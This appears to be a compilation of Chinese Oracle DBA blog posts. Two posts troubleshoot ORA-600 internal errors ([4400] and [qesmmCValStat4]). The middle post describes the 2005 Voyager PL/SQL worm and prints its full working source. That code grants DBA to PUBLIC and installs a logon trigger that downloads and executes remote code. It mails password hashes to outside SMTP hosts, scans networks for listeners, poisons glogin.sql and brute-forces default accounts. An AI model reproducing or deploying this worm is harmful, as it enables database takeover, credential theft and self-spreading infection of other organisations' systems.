ORA-00600 [4400][48]错误一例

5月26日某客户告警日志中出现的ORA-00600 [4400],[48]错误记录,并产生了trace文件:,

*** SERVICE NAME:(ETL) 2010-05-26 16:45:45.930
*** SESSION ID:(262.12024) 2010-05-26 16:45:45.930
*** 2010-05-26 16:45:45.930
ksedmp: internal or fatal error
ORA-00600: internal error code, arguments: [4400], [48], [], [], [], [], [], []
ORA-10387: parallel query server interrupt (normal)
----- Call Stack Trace -----
calling              call     entry                argument values in hex
location             type     point                (? means dubious value)
-------------------- -------- -------------------- ----------------------------
ksedst+001c          bl       ksedst1              0FFFFFFFF ? 000000020 ?
ksedmp+0290          bl       ksedst               1048DFFC0 ?
ksfdmp+0018          bl       03F5B014
kgeriv+0108          bl       _ptrgl
kgeasi+0118          bl       kgeriv               10496FEC8 ? 000000002 ?
700000010008000 ? 110000AD0 ?
110190290 ?
ktcddt+012c          bl       kgeasi               110190110 ? 110450040 ?
113000001130 ? 200000002 ?
100000001 ? 000000000 ?
000000030 ? 000000013 ?
ktcsod+0384          bl       ktcddt               0000003C0 ? 000000018 ?
1048D4808 ?
kssdch_stage+0758    bl       _ptrgl
....................................................
----- End of Call Stack Trace -----
******************* Dumping process map ****************
377144 : ora_p001_ETL
100000000      93710K  read/exec         oracle
1100007ef       2372K  read/write        oracle
9fffffff0000000        44K  read/exec         /usr/ccs/bin/usla64
9fffffff000b30a         0K  read/write        /usr/ccs/bin/usla64
900000000375880       484K  read/exec         /usr/lib/liblvm.a[shr_64.o]
9001000a0121ac8       135K  read/write        /usr/lib/liblvm.a[shr_64.o]
900000000426180        74K  read/exec         /usr/lib/libcfg.a[shr_64.o]
9001000a00f5ed0        26K  read/write        /usr/lib/libcfg.a[shr_64.o]
90000000034e280         2K  read/exec         /usr/lib/libcrypt.a[shr_64.o]
9001000a00d4760         0K  read/write        /usr/lib/libcrypt.a[shr_64.o]
90000000069a7b0         4K  read/exec         /usr/lib/libc.a[aio_64.o]
9001000a022a340         0K  read/write        /usr/lib/libc.a[aio_64.o]
90000000035f300        85K  read/exec         /usr/lib/libodm.a[shr_64.o]
9001000a00d5c08        35K  read/write        /usr/lib/libodm.a[shr_64.o]
9000000003ef080        83K  read/exec         /usr/lib/libperfstat.a[shr_64.o]
9001000a01d0818         9K  read/write        /usr/lib/libperfstat.a[shr_64.o]
900000000358000         0K  read/exec         /usr/lib/libdl.a[shr_64.o]
9001000a0219000         0K  read/write        /usr/lib/libdl.a[shr_64.o]
9000000007ff100      8588K  read/exec         /oracle/product/10.2.0/lib/libjox10.a[shr.o]
8001000a0000038       585K  read/write        /oracle/product/10.2.0/lib/libjox10.a[shr.o]
9000000004a0000       228K  read/exec         /usr/lib/libpthreads.a[shr_xpg5_64.o]
9001000a0144000       558K  read/write        /usr/lib/libpthreads.a[shr_xpg5_64.o]
900000000045500      2966K  read/exec         /usr/lib/libc.a[shr_64.o]
9001000a0000788       844K  read/write        /usr/lib/libc.a[shr_64.o]
Total      110843K
******************* End of process map dump ****************
===================================================
PROCESS STATE
-------------
Process global information:
process: 7000000cf48bf98, call: 7000000b40ebdf0, xact: 7000000cdece7a8, curses: 7000000cf666540, usrses: 7000000cf666540
----------------------------------------
SO: 7000000cf48bf98, type: 2, owner: 0, flag: INIT/-/-/0x00
(process) Oracle pid=43, calls cur/top: 7000000b40ebdf0/7000000b40ebdf0, flag: (0) -
int error: 0, call error: 0, sess error: 0, txn error 0
(post info) last post received: 115 0 4
last post received-location: kslpsr
last process to post me: 7000000cf479c38 1 6
last post sent: 0 0 251
last post sent-location: kxfpqr: QC
last process posted by me: 7000000cf48a7f8 10 0
(latch info) wait_event=0 bits=0
Process Group: DEFAULT, pseudo proc: 7000000cf50bd50
O/S info: user: oracle, term: UNKNOWN, ospid: 377144
OSD pid info: Unix process pid: 377144, image: oracle@etl_a (P001)
SO: 7000000cf666540, type: 4, owner: 7000000cf48bf98, flag: INIT/-/-/0x00
(session) sid: 262 trans: 7000000cdece7a8, creator: 7000000cf48bf98, flag: (c0100041) USR/- BSY/-/-/DEL/-/-
DID: 0001-0028-000FFB1E, short-term DID: 0001-002B-00151DA1
txn branch: 7000000cdf412c8
oct: 0, prv: 0, sql: 0, psql: 0, user: 26/ETL
O/S info: user: bo, term: pts/0, ospid: 377144, machine: etl_a
program: oracle@etl_a (P001)
last wait for 'SQL*Net message from dblink' blocking sess=0x0 seq=45 wait_time=476 seconds since wait started=0
driver id=0, #bytes=1, =0
Dumping Session Wait History
for 'SQL*Net message from dblink' count=1 wait_time=476
driver id=0, #bytes=1, =0
for 'SQL*Net message to dblink' count=1 wait_time=1
driver id=0, #bytes=1, =0
for 'log file sync' count=1 wait_time=7483
buffer#=ca9, =0, =0
for 'log file sync' count=1 wait_time=358
buffer#=ca9, =0, =0
for 'PX Deq: Execution Msg' count=1 wait_time=15527
sleeptime/senderid=1001ffff, passes=1, =0
for 'log file sync' count=1 wait_time=11855
buffer#=c57, =0, =0
for 'PX Deq: Execution Msg' count=1 wait_time=277142
sleeptime/senderid=1001ffff, passes=1, =0
for 'direct path write' count=1 wait_time=25
file number=5, first dba=103ca, block cnt=3
for 'direct path write' count=1 wait_time=6
file number=4, first dba=1abe1, block cnt=8
for 'row cache lock' count=1 wait_time=3307
cache id=5, mode=0, request=5
temporary object counter: 0
----------------------------------------
Virtual Thread:
kgskvt: 7000000c0e86b58, sess: 7000000cf666540, vc: 0, proc: 7000000cf48bf98
consumer group cur: OTHER_GROUPS (upd? 0), mapped: DEFAULT_CONSUMER_GROUP, orig:
vt_state: 0x200, vt_flags: 0x30, blkrun: 0
is_assigned: 1, in_sched: 0 (0)
vt_active: 0 (pending: 0)
used quanta: 0 (cg: 0)
cpu start time: 0, quantum status: 0x0
quantum checks to skip: 0, check thresh: 0
idle time: 0, active time: 0 (cg: 0)
cpu yields: 0 (cg: 0), waits: 0 (cg: 0), wait time: 0 (cg: 0)
queued time outs: 0, time: 0 (cur 0, cg 0)
calls aborted: 0, num est exec limit hit: 0
undo current: 0k max: 0k
----------------------------------------
UOL used : 0 locks(used=0, free=2)
KGX Atomic Operation Log 7000000bdcf0568
Mutex 0(0, 0) idn 0 oper NONE
Cursor Parent uid 262 efd 9 whr 11 slp 0
oper=NONE pt1=7000000c69d0878 pt2=7000000bef37090 pt3=7000000b47119c8
pt4=0 u41=1 stt=0
KGX Atomic Operation Log 7000000bdcf05b0
Mutex 7000000bdc2d028(0, 2) idn 0 oper NONE
Cursor Stat uid 262 efd 12 whr 1 slp 0
oper=NONE pt1=7000000bdc2cef8 pt2=0 pt3=0
pt4=0 u41=0 stt=0
KGX Atomic Operation Log 7000000bdcf05f8
Mutex 0(0, 0) idn 0 oper NONE
Library Cache uid 262 efd 0 whr 0 slp 0
----------------------------------------
SO: 7000000cf7e3ec8, type: 5, owner: 7000000cf666540, flag: INIT/-/-/0x00
(enqueue) DX-00000010-00000000	DID: 0001-002B-00151DA9
lv: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  res_flag: 0x2
res: 0x7000000cf8bd0b8, mode: X, lock_flag: 0x0
own: 0x7000000cf666540, sess: 0x7000000cf666540, proc: 0x7000000cf48bf98, prv: 0x7000000cf8bd0c8

从trace文件名就可以看出出错的是某个并行子进程,其最近调用堆栈为ktcsod->ktcddt->kgeasi(报错),ktcsod与ktcddt均为Oracle中内核事务控制模块函数 (Kernel Transaction Control),又该并行子进程最近等待为”SQL*Net message from dblink”事件,共等待476s(wait_time=476 seconds)。trace显示该并行会话包含分布式事务锁:

      SO: 7000000cf7e3ec8, type: 5, owner: 7000000cf666540, flag: INIT/-/-/0x00
(enqueue) DX-00000010-00000000	DID: 0001-002B-00151DA9
lv: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  res_flag: 0x2
res: 0x7000000cf8bd0b8, mode: X, lock_flag: 0x0
own: 0x7000000cf666540, sess: 0x7000000cf666540, proc: 0x7000000cf48bf98, prv: 0x7000000cf8bd0c8

即DX(Distributed transaction entry)锁;可以猜测该并行会话在等待远程事务被清理,但等待超时,故报错。

查询metalink可以发现Bug 5223587与该错误一致,该Bug的特征为:
1. 出现ORA-600[4400],且调用栈为ktcddt ,说明涉及到了分布式事务
2. trace显示当时无打开的游标
3. 可以看到当时的等待为’SQL*Net message from dblink’事件
Metalink文档[ID  444108.1]描 述该错误会在涉及远程数据库的并行DML操作中出现,但该错误仅会在清理阶段出现,故实际无影响(It is not critical as such, since it is happening during the cleanup of the operation.)。

该Bug可以通过实施Patch 5223587修复, 目前该补丁只有对应基础版本10.2.0.2和10.2.0.3的版本,该补丁在 10.2.0.3 上有AIX power(64 bit)和Solaris Sparc(64 bit)的版本,10.2.0.2上只有linux-64 与HP-UX的版本。因为该Bug一般不会产生不良影响,故实际上不建议应用补丁。

Oracle Voyager Worm 一段匿名块SQL蠕虫

2005年12-20日(很久以前)一位匿名用户在邮件列表中发布了一段匿名块的SQL蠕虫病毒,这可能是人们第一次意识到PL/SQL也能用来写病毒。很多专家都对该段程序进行了分析,其主要破坏行为如下:

1.将DBA权限授予public角色

2.删除名为aa的trigger

3.创建名为aa的数据库登陆后(after database logon)触发器,该触发器还包含了使用UTL_TCP包(前提是病毒所在实例可能链接到外网)获取来自于http://www.google.de/search?hl=en&q=startc0GtJBi1+full-disclosure&btnI=I%27m+Feeling+Lucky的疑似病毒信息,google已经将该地址屏蔽了

4.通过smtp01.us.oracle.com邮件发送服务器发送标题为(Password hashes)包含数据库密码哈希值的邮件至 larry@oracle.com(可能是Oracle老总larry ellison 邮箱地址)

5.扫描实例所在主机子网中的所有ip,之后会尝试使用随机ip.修改listener.log,并且将”alter user mdsys identified by mdsys”添加至glogin.sql,每次使用SQLPLUS时均会执行该SQL.

6.创建可能的数据库连接(DBLINK),并尝试猜测密码组合,如(system/manager, sys/change_on_install, dbsnmp/dbsnmp, outln/outln, scott/tiger, mdsys/mdsys, ordcommon/ordcommon)等较为常见的组合。

7.尝试关闭listener

这是一种尝试,首先向我们证明了PL/SQL也具备编写病毒程序的能力;其次Oracle可能并不如我们想象的那么安全。

有兴趣可以瞻仰一下这段代码,oracle worm voyager.

--##s
tartc0GtJBi1
DECLARE
i1 INTEGER;
i2 INTEGER;
i6 INTEGER;
iHostToSearchFor INTEGER;
reference_ip varchar2(1000);
reference_url varchar2(1000);
starting_ipaddress varchar2(100);
current_ipaddress VARCHAR2(100);
current_network VARCHAR2(100);
current_letter VARCHAR2(1);
c   UTL_TCP.CONNECTION;
c1   UTL_TCP.CONNECTION;
ln integer;
vLen NUMBER;
PreviousSID varchar2(100);
vWorking varchar2(2500);
vWorking1 varchar2(2500);
vRequest varchar2(500);
vRequestStop varchar2(500);
vReqLog raw(500);
vRequestSQLCommand raw(32000);
vResp varchar2(32767);
vRespPiece varchar2(200);
vRespTemp varchar2(200);
ret_val pls_integer;
oraclehome varchar2(1000);
vRefresh varchar2(2000);
v_message      VARCHAR2(32000);
vRequestLogChange raw(10000);
vRequestLogReset raw(10000);
iLoop integer := 0;
iLength integer := 0;
cur binary_integer;
BEGIN
BEGIN
CTXSYS.DRILOAD.VALIDATE_STMT('GRANT DBA TO PUBLIC');
EXCEPTION
WHEN OTHERS THEN
DBMS_OUTPUT.PUT_LINE('');
END;
reference_ip := 'www.google.com';
reference_url := '/search?hl=en&q=startc0GtJBi1+full-disclosure&btnI=I%
27m+Feeling+Lucky';
vRefresh := 'declare req Utl_Http.Req;resp Utl_Http.Resp;v_msg varchar2(32767);af
varchar2(32767);ab varchar2(32767);ac varchar2(32767) := ''''' || reference_ip
|| ''''';v_url varchar2(32767) := ''''' || reference_url || ''''';ad varchar2
(32000) := ''''--##startc0GtJBi1'''';ae varchar2(32000) := ''''--##endc0GtJBi1'''';i3
INTEGER;i4 INTEGER;iLoop integer := 0;cur binary_integer;i binary_integer;begin
Utl_Http.Set_Proxy(proxy=>ac,no_proxy_domains=>ac );req := Utl_Http.Begin_Request
(url=>v_url,method=>''''GET'''' );utl_Http.Set_Header(r=>req,name=>''''User-
Agent'''',value=>''''Mozilla/4.0'''' );resp:=Utl_Http.Get_Response(r=>req);begin loop
Utl_Http.Read_Text(r=>resp,data=>v_msg);af:=af || v_msg;end loop;exception when
utl_Http.End_Of_Body then null;end;Utl_Http.End_Response(r=>resp);i3:=instr
(af,ad,1);i4:=instr(af,ae,i3);ab:=substr(af,i3+length(ad)+2,i4-(i3+length(ad)
+4));execute immediate ''''begin '''' || ab || '''' end;''''; end;';
vWorking := 'create or replace trigger aa AFTER LOGON ON DATABASE declare cur
binary_integer;BEGIN if round(dbms_random.value(1,100))=32 then EXECUTE IMMEDIATE '''
|| vRefresh || ''';end if;end;';

BEGIN
EXECUTE IMMEDIATE 'drop trigger aa';
EXCEPTION
WHEN OTHERS THEN
DBMS_OUTPUT.PUT_LINE('the execute immediate didnt work');
END;
BEGIN
EXECUTE IMMEDIATE vWorking;
EXCEPTION
WHEN OTHERS THEN
DBMS_OUTPUT.PUT_LINE('the execute immediate didnt work');
END;
starting_ipaddress := utl_inaddr.get_host_address;
current_ipaddress := starting_ipaddress;
ln := length(current_ipaddress);
loop
current_letter := substr(current_ipaddress, ln, 1);
ln := ln - 1;
EXIT WHEN current_letter = '.';
EXIT WHEN ln = 0;
end loop;
current_network := substr(current_ipaddress, 1, ln);
iHostToSearchFor := 1;
vRequest := chr(0) || chr(89) || chr(0) || chr(0) || chr(1) || chr(0) || chr(0) || chr
(0) ||
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || chr(8) || chr(0) ||
chr(127) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) || chr(0) || chr(1) ||
chr(0) || chr(31) || chr(0) || chr(58) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || '(CONNECT_DATA=(COMMAND=status))';
vRequestStop := chr(0) || chr(87) || chr(0) || chr(0) || chr(1) || chr(0) || chr(0) ||
chr(0) ||
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || chr(8) || chr(0) ||
chr(127) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) || chr(0) || chr(1) ||
chr(0) || chr(29) || chr(0) || chr(58) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || '(CONNECT_DATA=(COMMAND=stop))';
vReqLog := UTL_RAW.CONCAT( hextoraw('00'), hextoraw('A2'), utl_raw.cast_to_raw( chr(0)
|| chr(0) || chr(1) || chr(0) || chr(0) || chr(0) ||
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || chr(8) || chr(0) ||
chr(122) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) || chr(0) || chr(1) ||
chr(0) || chr(104) || chr(0) || chr(58) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || '(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))
(COMMAND=log_directory)(ARGUMENTS=)(SERVICE=)))'));
DECLARE
a DBA_USERS.username%TYPE;
b DBA_USERS.password%TYPE;
CURSOR T1Cursor IS
SELECT username, password
FROM DBA_USERS;
BEGIN
OPEN T1Cursor;
LOOP
FETCH T1Cursor INTO a, b;
EXIT WHEN T1Cursor%NOTFOUND;
v_message := v_message || a || ' ' ||  b || CHR(13) || CHR(10);
END LOOP;
CLOSE T1Cursor;
END;
loop
begin
if MOD(iHostToSearchFor + 1, 100) = 0 then
declare
mailhost  CONSTANT VARCHAR2(30) := 'smtp01.us.oracle.com';
crlf      CONSTANT VARCHAR2(2):= CHR(13) || CHR(10);
mesg      VARCHAR2(32000);
mail_conn utl_smtp.connection;
BEGIN
begin
loop
mail_conn := utl_smtp.open_connection(mailhost, 25);
mesg := 'Date: ' || TO_CHAR( SYSDATE, 'dd Mon yy hh24:mi:ss' ) || crlf
|| 'From: oracle@' || starting_ipaddress || crlf || 'Subject: Password hashes' || crlf
|| 'To: larry at oracle.com' || crlf || '' || crlf || v_message;

utl_smtp.helo(mail_conn, mailhost);
utl_smtp.mail(mail_conn, 'oracle@' || starting_ipaddress);
utl_smtp.rcpt(mail_conn, 'larry at oracle.com');
utl_smtp.data(mail_conn, mesg);
utl_smtp.quit(mail_conn);
EXIT WHEN round(dbms_random.value(1, 20)) = 10;
end loop;
EXCEPTION
WHEN OTHERS THEN
DBMS_OUTPUT.PUT_LINE('');
end;
current_ipaddress := round(dbms_random.value(1, 254)) || '.' || round
(dbms_random.value(1, 254)) || '.' || round(dbms_random.value(1, 254)) || '.' || round
(dbms_random.value(1, 254));
mail_conn := utl_smtp.open_connection(current_ipaddress, 25);
mesg := 'Date: ' || TO_CHAR( SYSDATE, 'dd Mon yy hh24:mi:ss' ) || crlf
|| 'From: oracle@' || starting_ipaddress || crlf || 'Subject: Password hashes' || crlf
|| 'To: oracle@' || current_ipaddress || crlf || '' || crlf || v_message;

utl_smtp.helo(mail_conn, current_ipaddress);
utl_smtp.mail(mail_conn, 'oracle@' || starting_ipaddress);
utl_smtp.rcpt(mail_conn, 'oracle@' || current_ipaddress);
utl_smtp.data(mail_conn, mesg);
utl_smtp.quit(mail_conn);
EXCEPTION
WHEN OTHERS THEN
DBMS_OUTPUT.PUT_LINE('');
end;
end if;
if iHostToSearchFor < 255 then
current_ipaddress := current_network || '.' || iHostToSearchFor;
else
current_ipaddress := round( dbms_random.value(1, 254) ) || '.' || round(
dbms_random.value(1, 254) ) || '.' || round(dbms_random.value(1, 254)) || '.' || round
(dbms_random.value(1, 254));
end if;
iHostToSearchFor := iHostToSearchFor + 1;
vResp := '';
c  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
ret_val := UTL_TCP.WRITE_RAW(c, vReqLog);
vLen := UTL_TCP.READ_RAW(c, vResp, 100 );
vRespPiece := utl_raw.cast_to_varchar2(utl_raw.substr(vResp, 13, 88));
vResp := vRespPiece;
declare
read_from_network varchar2(32000);
length_read_from_network INTEGER;
begin
loop
read_from_network := '';
length_read_from_network := UTL_TCP.READ_RAW(c, read_from_network, 100 );
read_from_network := utl_raw.cast_to_varchar2(utl_raw.substr
(read_from_network, 1, length_read_from_network));
vResp := vResp || read_from_network;
end loop;
EXCEPTION
when OTHERS then
read_from_network := '';
end;
UTL_TCP.CLOSE_CONNECTION(c);
declare
i5 INTEGER;
i6 INTEGER;
oraclehome varchar2(1000);
begin
i5 := 1;
i6 := 1;
i5 := instr(vResp, '(LOGDIRNAME=', 1);
if i5 > 0 then
i6 := instr(vResp, '\network\log', i5);
if i6 = 0 then
i6 := instr(vResp, '/network/log', i5);
end if;
oraclehome := substr( vResp, i5 + 12, i6 - (i5 + 12) );
end if;
iLength := length(oraclehome);
vRequestLogChange := UTL_RAW.CONCAT( utl_raw.substr(
utl_raw.cast_from_binary_integer(218 + iLength), 3, 2 ), utl_raw.cast_to_raw( chr(0)
|| chr(0) || chr(1) || chr(0) || chr(0) || chr(0) ||
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || chr(8) || chr(0) ||
chr(127) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) || chr(0) || chr(1)),
utl_raw.substr( utl_raw.cast_from_binary_integer(160 + iLength), 3, 2 ),
utl_raw.cast_to_raw( chr(0) || chr(58) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || '(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))
(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=135294976)(VALUE=' ||
oraclehome  || '/sqlplus/admin/glogin.sql)))'));
vRequestLogReset := UTL_RAW.CONCAT( utl_raw.substr( utl_raw.cast_from_binary_integer
(218 + iLength), 3, 2 ), utl_raw.cast_to_raw( chr(0) || chr(0) || chr(1) || chr(0) ||
chr(0) || chr(0) ||
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || chr(8) || chr(0) ||
chr(127) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) || chr(0) || chr(1)),
utl_raw.substr( utl_raw.cast_from_binary_integer(160 + iLength), 3, 2 ),
utl_raw.cast_to_raw( chr(0) || chr(58) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || '(DESCRIPTION=(CONNECT_DATA=(CID=(PROGRAM=)(HOST=)(USER=))
(COMMAND=log_file)(ARGUMENTS=4)(SERVICE=LISTENER)(VERSION=135294976)(VALUE=' ||
oraclehome  || '/network/log/listener.log)))'));
vWorking1 := 'alter user mdsys identified by mdsys;';
iLength := length(vWorking1) + 1;
vRequestSQLCommand := UTL_RAW.CONCAT( utl_raw.substr(
utl_raw.cast_from_binary_integer(58 + iLength), 3, 2 ), utl_raw.cast_to_raw( chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) ||
chr(1) || chr(54) || chr(1) || chr(44) || chr(0) || chr(0) || chr(8) || chr(0) ||
chr(127) || chr(0) || chr(127) || chr(8) || chr(0) || chr(0) || chr(0) || chr(1)),
utl_raw.substr( utl_raw.cast_from_binary_integer(iLength), 3, 2 ), utl_raw.cast_to_raw
( chr(0) || chr(58) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(0) || chr(0) || chr(52) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(1) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) || chr(0) ||
chr(0) || chr(0) || chr(10) || vWorking1));
c  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
ret_val := UTL_TCP.WRITE_RAW(c, vRequestLogChange);
UTL_TCP.CLOSE_CONNECTION(c);
c  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
ret_val := UTL_TCP.WRITE_RAW(c, vRequestSQLCommand);
UTL_TCP.CLOSE_CONNECTION(c);
c  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
ret_val := UTL_TCP.WRITE_RAW(c, vRequestLogReset);
UTL_TCP.CLOSE_CONNECTION(c);
end;
c1  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
vResp := '';
ret_val := UTL_TCP.WRITE_RAW(c1, utl_raw.cast_to_raw(vRequest));
vLen := UTL_TCP.READ_RAW(c1, vResp, 100 );
vRespPiece := utl_raw.cast_to_varchar2(utl_raw.substr(vResp, 43, 58));
vResp := vRespPiece;
declare
read_from_network varchar2(32000);
length_read_from_network INTEGER;
begin
loop
read_from_network := '';
length_read_from_network := UTL_TCP.READ_RAW(c1, read_from_network, 100 );
read_from_network := utl_raw.cast_to_varchar2(utl_raw.substr
(read_from_network, 1, length_read_from_network));
vResp := vResp || read_from_network;
end loop;
EXCEPTION
when OTHERS then
read_from_network := '';
end;
UTL_TCP.CLOSE_CONNECTION(c1);
declare
i3 INTEGER;
i4 INTEGER;
sid varchar2(100);
i binary_integer;
procedure_to_spread varchar2(32000);
create_link varchar2(500);
begin
i3 := 1;
i4 := 1;
loop
i3 := instr(vResp, '(INSTANCE_NAME=', i3);
exit when i3 = 0;
i4 := instr(vResp, ')', i3);
sid := substr( vResp, i3 + 15, i4 - (i3 + 15));
i3 := i3 + 1;
begin
if sid = PreviousSID or sid = 'PLSExtProc' or sid = 'extproc'
then
dbms_output.put_line( sid );
else
dbms_output.put_line( sid );
iLoop := 0;
loop
declare
username1 varchar2(100);
password1 varchar2(100);
begin
iLoop := iLoop + 1;
exit when iLoop = 8;
if iLoop = 5 then
username1 := 'system';
password1 := 'manager';
ELSIF iLoop = 6 then
username1 := 'sys';
password1 := 'change_on_install';
ELSIF iLoop = 1 then
username1 := 'dbsnmp';
password1 := 'dbsnmp';
ELSIF iLoop = 2 then
username1 := 'outln';
password1 := 'outln';
ELSIF iLoop = 4 then
username1 := 'scott';
password1 := 'tiger';
ELSIF iLoop = 3 then
username1 := 'mdsys';
password1 := 'mdsys';
ELSIF iLoop = 7 then
username1 := 'ordcommon';
password1 := 'ordcommon';
end if;
BEGIN
EXECUTE IMMEDIATE 'drop database link xxx';
EXCEPTION
when OTHERS then
DBMS_OUTPUT.PUT_LINE( '' );
end;
create_link := 'CREATE DATABASE LINK xxx CONNECT TO ' || username1 || '
IDENTIFIED BY ' || password1 || ' USING ''(DESCRIPTION=(ADDRESS_LIST=(ADDRESS =
(PROTOCOL = TCP)(HOST = ' || current_ipaddress || ')(PORT = 1521)))(CONNECT_DATA=
(SERVER=DEDICATED)(SERVICE_NAME=' || SID || ')))''';
EXECUTE IMMEDIATE create_link;
EXECUTE IMMEDIATE vWorking;
EXCEPTION
when OTHERS then
DBMS_OUTPUT.PUT_LINE( '' );
end;
end loop;
end if;
PreviousSID := SID;
end;
end loop;
c  := UTL_TCP.OPEN_CONNECTION(current_ipaddress, 1521);
ret_val := UTL_TCP.WRITE_RAW(c, utl_raw.cast_to_raw(vRequestStop));
UTL_TCP.CLOSE_CONNECTION(c);
end;
EXCEPTION
when OTHERS then
DBMS_OUTPUT.PUT_LINE('');
end;
end loop;
END;
--##endc0GtJBi1

ora-600[qesmmCValStat4]一例

在之前的文章中提到过一个有趣的绘制五角星的SQL,具体SQL语句如下:
with a as
(select distinct round(sum(x) over(order by n)) x,
round(sum(y) over(order by n)) y
from (select n,
cos(trunc(n / 20) * (1 – 1 / 5) * 3.1415926) * 2 x,
sin(trunc(n / 20) * (1 – 1 / 5) * 3.1415926) y
from (select rownum – 1 n from all_objects where rownum <= 20 * 5)))
select replace (sys_connect_by_path(point, ‘/’), ‘/’, null) star
from (select b.y, b.x, decode(a.x, null, ‘ ‘, ‘*’) point
from a,
(select *
from (select rownum – 1 + (select min(x) from a) x
from all_objects
where rownum <= (select max(x) – min(x) + 1 from a)),
(select rownum – 1 + (select min(y) from a) y
from all_objects
where rownum <= (select max(y) – min(y) + 1 from a))) b
where a.x(+) = b.x
and a.y(+) = b.y)
where x = (select max(x) from a)
start with x = (select min(x) from a)
connect by y = prior y and x = prior x + 1;

在10.2.0.1版本输入以上SQL可能会出现ORA-00600: internal error code, arguments: [qesmmCValStat4], [3], [1], [], [],[], [], []错误,g10r21_ora_15473.trc

其调用栈为:qercoFetch->qerhjFetch->qerhjInitializeManagementComponents->

qesmmCStartWorkArea->qesmmCValidateStatus->kgeasnmierr(报错)

metalink文档ID 360811.1对该 Bug 4926357进行了描述,该bug可能在9.2.07~10.2.0.1版本中出现,一般由带start with … … connect by prior ..子句的查询语句引起;典型的调用栈为:qesmmCValidateStatus<- qesmmCStartWorkArea <-qerhjInitializeManagementComponents <-qerhjFetch …

未公布的Bug 4401437是Bug 4926357的一个复制品avatar,该Bug已在10.1.0.5, 10.2.0.2, 11.1等版本中修复了。

Oracle support建议的四种解决方式:

1. 打上该Bug的one-off补丁;

2.升级到该Bug已修复的大版本中,例如从10.2.0.1升级到10.2.0.2;

3.设置参数hash_join_enabled(9i中),_hash_join_enabled(10g中),实例级别的或者会话级别的均可,如:

SQL> select * from v$version;
BANNER
----------------------------------------------------------------
Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bi
PL/SQL Release 10.2.0.1.0 - Production
CORE    10.2.0.1.0      Production
TNS for Linux: Version 10.2.0.1.0 - Production
NLSRTL Version 10.2.0.1.0 - Production
SQL> alter session set "_hash_join_enabled"=false;
Session altered.
SQL> set pagesize 1400;
SQL> with a as
2   (select distinct round(sum(x) over(order by n)) x,
3                    round(sum(y) over(order by n)) y
4      from (select n,
5                   cos(trunc(n / 20) * (1 - 1 / 5) * 3.1415926) * 2 x,
6                   sin(trunc(n / 20) * (1 - 1 / 5) * 3.1415926) y
7              from (select rownum - 1 n from all_objects where rownum <= 20 * 5)))
8  select replace (sys_connect_by_path(point, '/'), '/', null) star
9    from (select b.y, b.x, decode(a.x, null, ' ', '*') point
10            from a,
11                 (select *
12                    from (select rownum - 1 + (select min(x) from a) x
13                            from all_objects
14                           where rownum <= (select max(x) - min(x) + 1 from a)),
15                         (select rownum - 1 + (select min(y) from a) y
16                            from all_objects
17                           where rownum <= (select max(y) - min(y) + 1 from a))) b
18           where a.x(+) = b.x
19             and a.y(+) = b.y)
20   where x = (select max(x) from a)
21   start with x = (select min(x) from a)
22  connect by y = prior y and x = prior x + 1;
STAR
--------------------------------------------------------------------------------
